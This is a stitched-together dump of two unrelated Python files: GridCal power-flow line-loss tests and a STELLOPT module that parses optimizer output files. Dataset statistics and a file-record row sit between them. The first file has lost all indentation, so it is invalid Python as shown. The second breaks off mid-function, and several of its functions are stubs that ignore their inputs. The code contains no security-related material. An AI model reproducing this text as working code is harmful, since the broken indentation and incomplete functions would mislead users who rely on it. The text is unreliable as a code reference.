# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GridCal. If not, see <http://www.gnu.org/licenses/>.
from GridCal.Engine.basic_structures import Logger
from GridCal.Engine.Core.multi_circuit import MultiCircuit
from GridCal.Engine.Devices.bus import Bus
from GridCal.Engine.Devices.load import Load
from GridCal.Engine.Devices.generator import Generator
from GridCal.Engine.Devices.line import Line
from GridCal.Engine.Simulations.PowerFlow.power_flow_driver import PowerFlowOptions, PowerFlowDriver
def test_line_losses_1():
"""
Basic line losses test.
"""
test_name = "test_line_losses_1"
grid = MultiCircuit(name=test_name)
Sbase = 100 # MVA
grid.Sbase = Sbase
grid.time_profile = None
grid.logger = Logger()
# Create buses
Bus0 = Bus(name="Bus0", vnom=25, is_slack=True)
Bus1 = Bus(name="Bus1", vnom=25)
grid.add_bus(Bus0)
grid.add_bus(Bus1)
# Create load
grid.add_load(Bus1, Load(name="Load0", P=1.0, Q=0.4))
# Create slack bus
grid.add_generator(Bus0, Generator(name="Utility"))
# Create cable (r and x should be in pu)
grid.add_branch(Line(bus_from=Bus0, bus_to=Bus1, name="Cable1", r=0.01, x=0.05))
# Run non-linear load flow
options = PowerFlowOptions(verbose=True)
power_flow = PowerFlowDriver(grid, options)
power_flow.run()
# Check solution
approx_losses = round(1000*power_flow.results.losses[0], 3)
solution = complex(0.116, 0.58) # Expected solution from GridCal
# Tested on ETAP 16.1.0 and pandapower
print("\n=================================================================")
print(f"Test: {test_name}")
print("=================================================================\n")
print(f"Results: {approx_losses}")
print(f"Solution: {solution}")
print()
print("Buses:")
for i, b in enumerate(grid.buses):
print(f" - bus[{i}]: {b}")
print()
print("Branches:")
branches = grid.get_branches()
for b in branches:
print(f" - {b}:")
print(f" R = {round(b.R, 4)} pu")
print(f" X = {round(b.X, 4)} pu")
print(f" X/R = {round(b.X/b.R, 2)}")
print()
print("Voltages:")
for i in range(len(grid.buses)):
print(f" - {grid.buses[i]}: voltage={round(power_flow.results.voltage[i], 3)} pu")
print()
print("Losses:")
for i in range(len(branches)):
print(f" - {branches[i]}: losses={round(power_flow.results.losses[i], 3)} MVA")
print()
print("Loadings (power):")
for i in range(len(branches)):
print(f" - {branches[i]}: loading={round(power_flow.results.Sf[i], 3)} MVA")
print()
print("Loadings (current):")
for i in range(len(branches)):
print(f" - {branches[i]}: loading={round(power_flow.results.If[i], 3)} pu")
print()
assert approx_losses == solution
def test_line_losses_2():
"""
Basic line losses test, with the impedance split into 2 series branches.
"""
test_name = "test_line_losses_2"
grid = MultiCircuit(name=test_name)
Sbase = 100 # MVA
grid.Sbase = Sbase
grid.time_profile = None
grid.logger = Logger()
# Create buses
Bus0 = Bus(name="Bus0", vnom=25, is_slack=True)
Bus1 = Bus(name="Bus1", vnom=25)
Bus2 = Bus(name="Bus1", vnom=25)
for b in Bus0, Bus1, Bus2:
grid.add_bus(b)
# Create load
grid.add_load(Bus2, Load(name="Load0", P=1.0, Q=0.4))
# Create slack bus
grid.add_generator(Bus0, Generator(name="Utility"))
# Create cable (r and x should be in pu)
grid.add_branch(Line(bus_from=Bus0, bus_to=Bus1, name="Cable0", r=0.005, x=0.025))
grid.add_branch(Line(bus_from=Bus1, bus_to=Bus2, name="Cable1", r=0.005, x=0.025))
# Run non-linear load flow
options = PowerFlowOptions(verbose=True)
power_flow = PowerFlowDriver(grid, options)
power_flow.run()
# Check solution
approx_losses = round(1000*sum(power_flow.results.losses), 3)
solution = complex(0.116, 0.58) # Expected solution from GridCal
# Tested on ETAP 16.1.0 and pandapower
print("\n=================================================================")
print(f"Test: {test_name}")
print("=================================================================\n")
print(f"Results: {approx_losses}")
print(f"Solution: {solution}")
print()
print("Buses:")
for i, b in enumerate(grid.buses):
print(f" - bus[{i}]: {b}")
print()
print("Branches:")
branches = grid.get_branches()
for b in branches:
print(f" - {b}:")
print(f" R = {round(b.R, 4)} pu")
print(f" X = {round(b.X, 4)} pu")
print(f" X/R = {round(b.X/b.R, 2)}")
print()
print("Voltages:")
for i in range(len(grid.buses)):
print(f" - {grid.buses[i]}: voltage={round(power_flow.results.voltage[i], 3)} pu")
print()
print("Losses:")
for i in range(len(branches)):
print(f" - {branches[i]}: losses={round(power_flow.results.losses[i], 3)} MVA")
print()
print("Loadings (power):")
for i in range(len(branches)):
print(f" - {branches[i]}: loading={round(power_flow.results.Sf[i], 3)} MVA")
print()
print("Loadings (current):")
for i in range(len(branches)):
print(f" - {branches[i]}: loading={round(power_flow.results.If[i], 3)} pu")
print()
assert approx_losses == solution
def test_line_losses_3():
"""
Basic line losses test, with the impedance split into 2 parallel branches.
"""
test_name = "test_line_losses_3"
grid = MultiCircuit(name=test_name)
Sbase = 100 # MVA
grid.Sbase = Sbase
grid.time_profile = None
grid.logger = Logger()
# Create buses
Bus0 = Bus(name="Bus0", vnom=25, is_slack=True)
Bus1 = Bus(name="Bus1", vnom=25)
for b in Bus0, Bus1:
grid.add_bus(b)
# Create load
grid.add_load(Bus1, Load(name="Load0", P=1.0, Q=0.4))
# Create slack bus
grid.add_generator(Bus0, Generator(name="Utility"))
# Create cable (r and x should be in pu)
grid.add_branch(Line(bus_from=Bus0, bus_to=Bus1, name="Cable0", r=0.02, x=0.1))
grid.add_branch(Line(bus_from=Bus0, bus_to=Bus1, name="Cable1", r=0.02, x=0.1))
# Run non-linear load flow
options = PowerFlowOptions(verbose=True)
power_flow = PowerFlowDriver(grid, options)
power_flow.run()
# Check solution
approx_losses = round(1000*sum(power_flow.results.losses), 3)
solution = complex(0.116, 0.58) # Expected solution from GridCal
# Tested on ETAP 16.1.0 and pandapower
print("\n=================================================================")
print(f"Test: {test_name}")
print("=================================================================\n")
print(f"Results: {approx_losses}")
print(f"Solution: {solution}")
print()
print("Buses:")
for i, b in enumerate(grid.buses):
print(f" - bus[{i}]: {b}")
print()
print("Branches:")
branches = grid.get_branches()
for b in branches:
print(f" - {b}:")
print(f" R = {round(b.R, 4)} pu")
print(f" X = {round(b.X, 4)} pu")
print(f" X/R = {round(b.X/b.R, 2)}")
print()
print("Voltages:")
for i in range(len(grid.buses)):
print(f" - {grid.buses[i]}: voltage={round(power_flow.results.voltage[i], 3)} pu")
print()
print("Losses:")
for i in range(len(branches)):
print(f" - {branches[i]}: losses={round(power_flow.results.losses[i], 3)} MVA")
print()
print("Loadings (power):")
for i in range(len(branches)):
print(f" - {branches[i]}: loading={round(power_flow.results.Sf[i], 3)} MVA")
print()
print("Loadings (current):")
for i in range(len(branches)):
print(f" - {branches[i]}: loading={round(power_flow.results.If[i], 3)} pu")
print()
assert approx_losses == solution
| 31.715867 | 100 | 0.591041 | 1,203 | 8,595 | 4.143807 | 0.144638 | 0.04333 | 0.048144 | 0.026479 | 0.818054 | 0.808425 | 0.774724 | 0.774724 | 0.774724 | 0.766098 | 0 | 0.028431 | 0.218383 | 8,595 | 270 | 101 | 31.833333 | 0.713605 | 0.160093 | 0 | 0.854651 | 0 | 0.069767 | 0.288238 | 0.127015 | 0 | 0 | 0 | 0 | 0.017442 | 1 | 0.017442 | false | 0 | 0.040698 | 0 | 0.05814 | 0.47093 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
db6ef2acf3c19af190b0d20856a5557bd14c6d4f | 22,964 | py | Python | pySTEL/libstell/stellopt.py | joseluisvelasco/STELLOPT | e064ebb96414d5afc4e205f43b44766558dca2af | [
"MIT"
] | 29 | 2020-05-08T01:47:34.000Z | 2022-03-06T10:35:28.000Z | pySTEL/libstell/stellopt.py | joseluisvelasco/STELLOPT | e064ebb96414d5afc4e205f43b44766558dca2af | [
"MIT"
] | 77 | 2020-05-08T07:18:09.000Z | 2022-03-30T11:20:33.000Z | pySTEL/libstell/stellopt.py | joseluisvelasco/STELLOPT | e064ebb96414d5afc4e205f43b44766558dca2af | [
"MIT"
] | 3 | 2021-02-10T13:47:08.000Z | 2022-03-21T12:53:43.000Z | def read_stellopt_namelist(iunit,istat):
import os, sys
import numpy.ctypeslib as npct
import numpy as np
# Load Libraries
# Setup Arrays
stellopt_namelist={}
# Will delete this just using for testing
stellopt_namelist['NFUNC_MAX'] = 5000
stellopt_namelist['OPT_TYPE'] = 'LMDIF'
stellopt_namelist['EQUIL_TYPE'] = 'VMEC2000'
stellopt_namelist['FTOL'] = 1.0E-6
stellopt_namelist['XTOL'] = 1.0E-6
stellopt_namelist['GTOL'] = 1.0E-30
stellopt_namelist['EPSFCN'] = 1.0E-4
stellopt_namelist['MODE'] = 1
stellopt_namelist['FACTOR'] = 100
stellopt_namelist['CR_STRATEGY'] = 0
stellopt_namelist['NPOPULATION'] = -1
stellopt_namelist['NOPTIMIZERS'] = -1
# Vars
for name in ['PHIEDGE','PRES_SCALE','CURTOR']:
stellopt_namelist['L'+name+'_OPT'] = 0
stellopt_namelist['D'+name+'_OPT'] = 1.0
stellopt_namelist[ name+'_MIN'] = -1E30
stellopt_namelist[ name+'_MAX'] = +1E30
# Arrays
for name in ['AM','AC','AI','EXTCUR']:
stellopt_namelist['L'+name+'_OPT'] = np.ndarray(20)
stellopt_namelist['D'+name+'_OPT'] = np.ndarray(20)
stellopt_namelist[ name+'_MIN'] = np.ndarray(20)
stellopt_namelist[ name+'_MAX'] = np.ndarray(20)
for i in range(20):
stellopt_namelist['L'+name+'_OPT'][i] = 0
stellopt_namelist['D'+name+'_OPT'][i] = 1.0
stellopt_namelist[ name+'_MIN'][i] = -1E10
stellopt_namelist[ name+'_MAX'][i] = +1E10
# Matrices
arr_size1=2*101+1
arr_size2=100+1
stellopt_namelist['LBOUND_OPT'] = np.ndarray((arr_size1,arr_size2))
stellopt_namelist['DBOUND_OPT'] = np.ndarray((arr_size1,arr_size2))
stellopt_namelist['BOUND_MIN'] = np.ndarray((arr_size1,arr_size2))
stellopt_namelist['BOUND_MAX'] = np.ndarray((arr_size1,arr_size2))
stellopt_namelist['LRHO_OPT'] = np.ndarray((arr_size1,arr_size2))
stellopt_namelist['DRHO_OPT'] = np.ndarray((arr_size1,arr_size2))
stellopt_namelist['LDELTAMN_OPT'] = np.ndarray((arr_size1,arr_size1))
stellopt_namelist['DDELTAMN_OPT'] = np.ndarray((arr_size1,arr_size1))
stellopt_namelist['DELTA_MIN'] = np.ndarray((arr_size1,arr_size1))
stellopt_namelist['DELTA_MAX'] = np.ndarray((arr_size1,arr_size1))
for n in range(arr_size1):
for m in range(arr_size2):
stellopt_namelist['LBOUND_OPT'][n,m]=0
stellopt_namelist['DBOUND_OPT'][n,m]=1.0
stellopt_namelist['BOUND_MIN'][n,m]=-1.0E10
stellopt_namelist['BOUND_MAX'][n,m]=+1.0E10
stellopt_namelist['LRHO_OPT'][n,m]=0
stellopt_namelist['DRHO_OPT'][n,m]=1.0
for n in range(arr_size1):
for m in range(arr_size1):
stellopt_namelist['LDELTAMN_OPT'][n,m]=0
stellopt_namelist['DDELTAMN_OPT'][n,m]=1.0
stellopt_namelist['DELTA_MIN'][n,m]=-1.0E10
stellopt_namelist['DELTA_MAX'][n,m]=+1.0E10
return stellopt_namelist;
def write_stellopt_namelist(filename,stellopt_namelist):
import os, sys
import ctypes as ct
import numpy.ctypeslib as npct
import numpy as np
# Load Libraries
try:
libstell = ct.cdll.LoadLibrary(os.environ["STELLOPT_PATH"]+"/LIBSTELL/Release/libstell.so")
except KeyError:
print("Please set environment variable STELLOPT_PATH")
sys.exit(1)
# Handle interface
#read_stellopt_input = getattr(libstell,'__vmec_input_MOD_read_indata_namelist')
#SUBROUTINE read_stellopt_input (iunit, istat)
#read_stellopt_input.argtypes = [ct.POINTER(ct.c_int),ct.POINTER(ct.c_int)]
#read_stellopt_input.restype=None
#iunit_temp = ct.c_int(iunit)
#istat_temp = ct.c_int(istat)
#read_stellopt_input(ct.byref(iunit_temp),ct.byref(istat_temp))
#istat = istat_temp
#iunit = iunit_temp
# Setup Arrays
stellopt_namelist={}
# Will delete this just using for testing
for i,item in enumerate(stellopt_namelist):
print(item)
return stellopt_namelist;
def read_stellopt(filename):
import numpy as np
# import numpy as np
file_handle = open(filename,'r')
stel_data={}
niter = 0
for line in file_handle:
if 'ITER' in line:
niter=niter+1
if 'MIN' in line:
niter=niter-1
stel_data['ITER'] = np.ndarray((niter,1));
file_handle.seek(0)
line = file_handle.readline()
ttype,wh=line.split()
stel_data[ttype] = float(wh)
# Enter Loop
citer = -1
while True:
line = file_handle.readline()
if line == '':
break
ttype,hw = line.split(' ',1)
if ttype == 'ITER':
if 'MIN' in hw:
break
citer = citer+1
stel_data[ttype][citer] = int(hw)
continue
elif ttype == 'VERSION':
stel_data[ttype][citer] = float(hw)
continue
elif ttype == 'TARGETS':
h,w = hw.split()
h = int(h)
w = int(w)
if h == 1:
h=w
w=1
line = file_handle.readline()
elif ttype == 'SIGMAS':
h,w = hw.split()
h = int(h)
w = int(w)
if h == 1:
h=w
w=1
line = file_handle.readline()
elif ttype == 'VALS':
h,w = hw.split()
h = int(h)
w = int(w)
if h == 1:
h=w
w=1
line = file_handle.readline()
else:
h,w = hw.split()
h = int(h)
w = int(w)
line = file_handle.readline()
if ttype not in stel_data:
stel_data[ttype]=np.ndarray((niter,h,w))
for i in range(h):
line = file_handle.readline()
val = np.fromstring(line,sep=' ')
stel_data[ttype][citer,i,:] = val
file_handle.close()
for item in list(stel_data):
#print(item)
if 'VERSION' == item:
continue
elif 'ITER' == item:
continue
elif item in ['ASPECT','ASPECT_MAX','BETA','CURTOR','KAPPA','PHIEDGE', \
'VOLUME','WP','RBTOR','R0','Z0','BETATOR','BETAPOL','TEST_X',\
'TEST_Y']:
stel_data[item+'_target'] = np.squeeze(stel_data[item][:,:,0])
stel_data[item+'_sigma'] = np.squeeze(stel_data[item][:,:,1])
stel_data[item+'_equil'] = np.squeeze(stel_data[item][:,:,2])
stel_data[item+'_chisq'] = ((stel_data[item+'_target'] - stel_data[item+'_equil'])/stel_data[item+'_sigma'])**2
elif item == 'BALLOON':
stel_data[item+'_target'] = np.squeeze(stel_data[item][:,:,0])
stel_data[item+'_sigma'] = np.squeeze(stel_data[item][:,:,1])
stel_data[item+'_equil'] = np.squeeze(stel_data[item][:,:,2])
stel_data[item+'_chisq'] = ((stel_data[item+'_target'] - stel_data[item+'_equil'])/stel_data[item+'_sigma'])**2
stel_data[item+'_grate'] = np.squeeze(stel_data[item][:,:,3])
stel_data[item+'_theta'] = np.squeeze(stel_data[item][:,:,4])
stel_data[item+'_zeta'] = np.squeeze(stel_data[item][:,:,5])
stel_data[item+'_k'] = np.squeeze(stel_data[item][:,:,6])
elif item == 'B_PROBES':
stel_data[item+'_target'] = np.squeeze(stel_data[item][:,:,4])
stel_data[item+'_sigma'] = np.squeeze(stel_data[item][:,:,5])
stel_data[item+'_equil'] = np.squeeze(stel_data[item][:,:,6])
stel_data[item+'_chisq'] = ((stel_data[item+'_target'] - stel_data[item+'_equil'])/stel_data[item+'_sigma'])**2
stel_data[item+'_X'] = np.squeeze(stel_data[item][:,:,0])
stel_data[item+'_Y'] = np.squeeze(stel_data[item][:,:,1])
stel_data[item+'_Z'] = np.squeeze(stel_data[item][:,:,2])
stel_data[item+'_MODB'] = np.squeeze(stel_data[item][:,:,3])
elif item in ['FLUXLOOPS','SEGROG']:
stel_data[item+'_target'] = np.squeeze(stel_data[item][:,:,0])
stel_data[item+'_sigma'] = np.squeeze(stel_data[item][:,:,1])
stel_data[item+'_equil'] = np.squeeze(stel_data[item][:,:,2])
stel_data[item+'_chisq'] = ((stel_data[item+'_target'] - stel_data[item+'_equil'])/stel_data[item+'_sigma'])**2
elif item == 'EXTCUR':
stel_data[item+'_target'] = np.squeeze(stel_data[item][:,:,0])
stel_data[item+'_sigma'] = np.squeeze(stel_data[item][:,:,1])
stel_data[item+'_equil'] = np.squeeze(stel_data[item][:,:,2])
stel_data[item+'_chisq'] = ((stel_data[item+'_target'] - stel_data[item+'_equil'])/stel_data[item+'_sigma'])**2
stel_data[item+'_dex'] = np.squeeze(stel_data[item][:,:,3])
elif item in ['SEPARATRIX','LIMITER']:
stel_data[item+'_target'] = np.squeeze(stel_data[item][:,:,0])
stel_data[item+'_sigma'] = np.squeeze(stel_data[item][:,:,1])
stel_data[item+'_equil'] = np.squeeze(stel_data[item][:,:,2])
stel_data[item+'_chisq'] = ((stel_data[item+'_target'] - stel_data[item+'_equil'])/stel_data[item+'_sigma'])**2
stel_data[item+'_R'] = np.squeeze(stel_data[item][:,:,3])
stel_data[item+'_PHI'] = np.squeeze(stel_data[item][:,:,4])
stel_data[item+'_Z'] = np.squeeze(stel_data[item][:,:,5])
elif item in ['NE','TI','TE','IOTA','VPHI','PRESS','VACIOTA','PRSSPRIME']:
stel_data[item+'_target'] = np.squeeze(stel_data[item][:,:,4])
stel_data[item+'_sigma'] = np.squeeze(stel_data[item][:,:,5])
stel_data[item+'_equil'] = np.squeeze(stel_data[item][:,:,6])
stel_data[item+'_chisq'] = ((stel_data[item+'_target'] - stel_data[item+'_equil'])/stel_data[item+'_sigma'])**2
stel_data[item+'_R'] = np.squeeze(stel_data[item][:,:,0])
stel_data[item+'_PHI'] = np.squeeze(stel_data[item][:,:,1])
stel_data[item+'_Z'] = np.squeeze(stel_data[item][:,:,2])
stel_data[item+'_s'] = np.squeeze(stel_data[item][:,:,3])
elif item in ['NELINE','TELINE','TILINE','ZEFFLINE','FARADAY','SXR','XICS','XICS_BRIGHT','XICS_W3','XICS_V']:
stel_data[item+'_target'] = np.squeeze(stel_data[item][:,:,0])
stel_data[item+'_sigma'] = np.squeeze(stel_data[item][:,:,1])
stel_data[item+'_equil'] = np.squeeze(stel_data[item][:,:,2])
stel_data[item+'_chisq'] = ((stel_data[item+'_target'] - stel_data[item+'_equil'])/stel_data[item+'_sigma'])**2
stel_data[item+'_R0'] = np.squeeze(stel_data[item][:,:,3])
stel_data[item+'_PHI0'] = np.squeeze(stel_data[item][:,:,4])
stel_data[item+'_Z0'] = np.squeeze(stel_data[item][:,:,5])
stel_data[item+'_R1'] = np.squeeze(stel_data[item][:,:,6])
stel_data[item+'_PHI1'] = np.squeeze(stel_data[item][:,:,7])
stel_data[item+'_Z1'] = np.squeeze(stel_data[item][:,:,8])
elif item == 'VISBREMLINE':
stel_data[item+'_target'] = np.squeeze(stel_data[item][:,:,0])
stel_data[item+'_sigma'] = np.squeeze(stel_data[item][:,:,1])
stel_data[item+'_equil'] = np.squeeze(stel_data[item][:,:,2])
stel_data[item+'_LAMBDA'] = np.squeeze(stel_data[item][:,:,3])
stel_data[item+'_CALIB'] = np.squeeze(stel_data[item][:,:,4])
stel_data[item+'_chisq'] = ((stel_data[item+'_target'] - stel_data[item+'_equil']*stel_data[item+'_CALIB'])/stel_data[item+'_sigma'])**2
stel_data[item+'_R0'] = np.squeeze(stel_data[item][:,:,5])
stel_data[item+'_PHI0'] = np.squeeze(stel_data[item][:,:,6])
stel_data[item+'_Z0'] = np.squeeze(stel_data[item][:,:,7])
stel_data[item+'_R1'] = np.squeeze(stel_data[item][:,:,8])
stel_data[item+'_PHI1'] = np.squeeze(stel_data[item][:,:,9])
stel_data[item+'_Z1'] = np.squeeze(stel_data[item][:,:,10])
elif item == 'MSE':
stel_data[item+'_target'] = np.squeeze(stel_data[item][:,:,4])
stel_data[item+'_sigma'] = np.squeeze(stel_data[item][:,:,5])
stel_data[item+'_equil'] = np.squeeze(stel_data[item][:,:,8])
stel_data[item+'_chisq'] = ((stel_data[item+'_target'] - stel_data[item+'_equil'])/stel_data[item+'_sigma'])**2
stel_data[item+'_R'] = np.squeeze(stel_data[item][:,:,0])
stel_data[item+'_PHI'] = np.squeeze(stel_data[item][:,:,1])
stel_data[item+'_Z'] = np.squeeze(stel_data[item][:,:,2])
stel_data[item+'_s'] = np.squeeze(stel_data[item][:,:,3])
stel_data[item+'_ER'] = np.squeeze(stel_data[item][:,:,6])
stel_data[item+'_EZ'] = np.squeeze(stel_data[item][:,:,7])
elif item == 'BOOTSTRAP':
stel_data[item+'_target'] = np.squeeze(stel_data[item][:,:,0])
stel_data[item+'_sigma'] = np.squeeze(stel_data[item][:,:,1])
stel_data[item+'_equil'] = np.squeeze(stel_data[item][:,:,2])
stel_data[item+'_chisq'] = ((stel_data[item+'_target'] - stel_data[item+'_equil'])/stel_data[item+'_sigma'])**2
stel_data[item+'_s'] = np.squeeze(stel_data[item][:,:,3])
stel_data[item+'_avg_jdotb'] = np.squeeze(stel_data[item][:,:,4])
stel_data[item+'_beam_jdotb'] = np.squeeze(stel_data[item][:,:,5])
stel_data[item+'_boot_jdotb'] = np.squeeze(stel_data[item][:,:,6])
stel_data[item+'_jBbs'] = np.squeeze(stel_data[item][:,:,7])
stel_data[item+'_facnu'] = np.squeeze(stel_data[item][:,:,8])
stel_data[item+'_bsnorm'] = np.squeeze(stel_data[item][:,:,9])
elif item == 'HELICITY':
stel_data[item+'_target'] = np.squeeze(stel_data[item][:,:,0])
stel_data[item+'_sigma'] = np.squeeze(stel_data[item][:,:,1])
stel_data[item+'_equil'] = np.squeeze(stel_data[item][:,:,2])
stel_data[item+'_chisq'] = ((stel_data[item+'_target'] - stel_data[item+'_equil'])/stel_data[item+'_sigma'])**2
stel_data[item+'_bnorm'] = np.squeeze(stel_data[item][:,:,3])
elif item == 'HELICITY_FULL':
stel_data[item+'_target'] = np.squeeze(stel_data[item][:,:,0])
stel_data[item+'_sigma'] = np.squeeze(stel_data[item][:,:,1])
stel_data[item+'_equil'] = np.squeeze(stel_data[item][:,:,2])
stel_data[item+'_chisq'] = ((stel_data[item+'_target'] - stel_data[item+'_equil'])/stel_data[item+'_sigma'])**2
stel_data[item+'_bnorm'] = np.squeeze(stel_data[item][:,:,3])
stel_data[item+'_k'] = np.squeeze(stel_data[item][:,:,4])
stel_data[item+'_m'] = np.squeeze(stel_data[item][:,:,5])
stel_data[item+'_n'] = np.squeeze(stel_data[item][:,:,6])
elif item == 'TXPORT':
stel_data[item+'_target'] = np.squeeze(stel_data[item][:,:,0])
stel_data[item+'_sigma'] = np.squeeze(stel_data[item][:,:,1])
stel_data[item+'_equil'] = np.squeeze(stel_data[item][:,:,2])
stel_data[item+'_chisq'] = ((stel_data[item+'_target'] - stel_data[item+'_equil'])/stel_data[item+'_sigma'])**2
stel_data[item+'_s'] = np.squeeze(stel_data[item][:,:,3])
elif item == 'KINK':
stel_data[item+'_target'] = np.squeeze(stel_data[item][:,:,0])
stel_data[item+'_sigma'] = np.squeeze(stel_data[item][:,:,1])
stel_data[item+'_equil'] = np.squeeze(stel_data[item][:,:,2])
stel_data[item+'_chisq'] = ((stel_data[item+'_target'] - stel_data[item+'_equil'])/stel_data[item+'_sigma'])**2
stel_data[item+'_wp'] = np.squeeze(stel_data[item][:,:,3])
stel_data[item+'_wk'] = np.squeeze(stel_data[item][:,:,4])
stel_data[item+'_omega'] = np.squeeze(stel_data[item][:,:,5])
elif item == 'COIL_BNORM':
stel_data[item+'_target'] = np.squeeze(stel_data[item][:,:,0])
stel_data[item+'_sigma'] = np.squeeze(stel_data[item][:,:,1])
stel_data[item+'_equil'] = np.squeeze(stel_data[item][:,:,2])
stel_data[item+'_chisq'] = ((stel_data[item+'_target'] - stel_data[item+'_equil'])/stel_data[item+'_sigma'])**2
stel_data[item+'_U'] = np.squeeze(stel_data[item][:,:,3])
stel_data[item+'_V'] = np.squeeze(stel_data[item][:,:,4])
stel_data[item+'_BNEQ'] = np.squeeze(stel_data[item][:,:,5])
stel_data[item+'_BNF'] = np.squeeze(stel_data[item][:,:,6])
elif item == 'ORBIT':
stel_data[item+'_target'] = np.squeeze(stel_data[item][:,:,0])
stel_data[item+'_sigma'] = np.squeeze(stel_data[item][:,:,1])
stel_data[item+'_equil'] = np.squeeze(stel_data[item][:,:,2])
stel_data[item+'_chisq'] = ((stel_data[item+'_target'] - stel_data[item+'_equil'])/stel_data[item+'_sigma'])**2
stel_data[item+'_s'] = np.squeeze(stel_data[item][:,:,3])
elif item == 'J_STAR':
stel_data[item+'_target'] = np.squeeze(stel_data[item][:,:,0])
stel_data[item+'_sigma'] = np.squeeze(stel_data[item][:,:,1])
stel_data[item+'_equil'] = np.squeeze(stel_data[item][:,:,2])
stel_data[item+'_chisq'] = ((stel_data[item+'_target'] - stel_data[item+'_equil'])/stel_data[item+'_sigma'])**2
stel_data[item+'_AVGJSTAR'] = np.squeeze(stel_data[item][:,:,3])
stel_data[item+'_TRAPSJSTAR'] = np.squeeze(stel_data[item][:,:,4])
stel_data[item+'_UJSTAR'] = np.squeeze(stel_data[item][:,:,5])
stel_data[item+'_K'] = np.squeeze(stel_data[item][:,:,6])
stel_data[item+'_IJSTAR'] = np.squeeze(stel_data[item][:,:,7])
elif item == 'NEO':
stel_data[item+'_target'] = np.squeeze(stel_data[item][:,:,0])
stel_data[item+'_sigma'] = np.squeeze(stel_data[item][:,:,1])
stel_data[item+'_equil'] = np.squeeze(stel_data[item][:,:,2])
stel_data[item+'_chisq'] = ((stel_data[item+'_target'] - stel_data[item+'_equil'])/stel_data[item+'_sigma'])**2
stel_data[item+'_k'] = np.squeeze(stel_data[item][:,:,3])
elif item == 'JDOTB':
stel_data[item+'_target'] = np.squeeze(stel_data[item][:,:,0])
stel_data[item+'_sigma'] = np.squeeze(stel_data[item][:,:,1])
stel_data[item+'_equil'] = np.squeeze(stel_data[item][:,:,2])
stel_data[item+'_chisq'] = ((stel_data[item+'_target'] - stel_data[item+'_equil'])/stel_data[item+'_sigma'])**2
stel_data[item+'_s'] = np.squeeze(stel_data[item][:,:,3])
elif item == 'JTOR':
stel_data[item+'_target'] = np.squeeze(stel_data[item][:,:,0])
stel_data[item+'_sigma'] = np.squeeze(stel_data[item][:,:,1])
stel_data[item+'_equil'] = np.squeeze(stel_data[item][:,:,2])
stel_data[item+'_chisq'] = ((stel_data[item+'_target'] - stel_data[item+'_equil'])/stel_data[item+'_sigma'])**2
stel_data[item+'_s'] = np.squeeze(stel_data[item][:,:,3])
elif item == 'DKES':
stel_data[item+'_target'] = np.squeeze(stel_data[item][:,:,0])
stel_data[item+'_sigma'] = np.squeeze(stel_data[item][:,:,1])
stel_data[item+'_equil'] = np.squeeze(stel_data[item][:,:,2])
stel_data[item+'_chisq'] = ((stel_data[item+'_target'] - stel_data[item+'_equil'])/stel_data[item+'_sigma'])**2
stel_data[item+'_s'] = np.squeeze(stel_data[item][:,:,3])
stel_data[item+'_nu'] = np.squeeze(stel_data[item][:,:,4])
stel_data[item+'_er'] = np.squeeze(stel_data[item][:,:,5])
stel_data[item+'_L11p'] = np.squeeze(stel_data[item][:,:,6])
stel_data[item+'_L11m'] = np.squeeze(stel_data[item][:,:,7])
stel_data[item+'_L33p'] = np.squeeze(stel_data[item][:,:,8])
stel_data[item+'_L33m'] = np.squeeze(stel_data[item][:,:,9])
stel_data[item+'_L31p'] = np.squeeze(stel_data[item][:,:,10])
stel_data[item+'_L31m'] = np.squeeze(stel_data[item][:,:,11])
stel_data[item+'_scal11'] = np.squeeze(stel_data[item][:,:,12])
stel_data[item+'_scal33'] = np.squeeze(stel_data[item][:,:,13])
stel_data[item+'_scal31'] = np.squeeze(stel_data[item][:,:,14])
elif item == 'ECEREFLECT':
stel_data[item+'_target'] = np.squeeze(stel_data[item][:,:,0])
stel_data[item+'_sigma'] = np.squeeze(stel_data[item][:,:,1])
stel_data[item+'_equil'] = np.squeeze(stel_data[item][:,:,2])
stel_data[item+'_chisq'] = ((stel_data[item+'_target'] - stel_data[item+'_equil'])/stel_data[item+'_sigma'])**2
stel_data[item+'_freq'] = np.squeeze(stel_data[item][:,:,3])
stel_data[item+'_tradx'] = np.squeeze(stel_data[item][:,:,4])
stel_data[item+'_trado'] = np.squeeze(stel_data[item][:,:,5])
stel_data[item+'_mix'] = np.squeeze(stel_data[item][:,:,6])
elif item == 'MAGWELL':
stel_data[item+'_target'] = np.squeeze(stel_data[item][:,:,0])
stel_data[item+'_sigma'] = np.squeeze(stel_data[item][:,:,1])
stel_data[item+'_equil'] = np.squeeze(stel_data[item][:,:,2])
stel_data[item+'_chisq'] = ((stel_data[item+'_target'] - stel_data[item+'_equil'])/stel_data[item+'_sigma'])**2
stel_data[item+'_Bsqav'] = np.squeeze(stel_data[item][:,:,3])
stel_data[item+'_p'] = np.squeeze(stel_data[item][:,:,4])
stel_data[item+'_pp'] = np.squeeze(stel_data[item][:,:,5])
stel_data[item+'_k'] = np.squeeze(stel_data[item][:,:,6])
elif item == 'CURVATURE_KERT':
stel_data[item+'_target'] = np.squeeze(stel_data[item][:,:,0])
stel_data[item+'_sigma'] = np.squeeze(stel_data[item][:,:,1])
stel_data[item+'_equil'] = np.squeeze(stel_data[item][:,:,2])
stel_data[item+'_chisq'] = ((stel_data[item+'_target'] - stel_data[item+'_equil'])/stel_data[item+'_sigma'])**2
stel_data[item+'_kurtosis'] = np.squeeze(stel_data[item][:,:,3])
stel_data[item+'_kappa_avg'] = np.squeeze(stel_data[item][:,:,4])
stel_data[item+'_kappa_max'] = np.squeeze(stel_data[item][:,:,5])
stel_data[item+'_phi'] = np.squeeze(stel_data[item][:,:,6])
elif item == 'CURVATURE_P2':
stel_data[item+'_target'] = np.squeeze(stel_data[item][:,:,0])
stel_data[item+'_sigma'] = np.squeeze(stel_data[item][:,:,1])
stel_data[item+'_equil'] = np.squeeze(stel_data[item][:,:,2])
stel_data[item+'_chisq'] = ((stel_data[item+'_target'] - stel_data[item+'_equil'])/stel_data[item+'_sigma'])**2
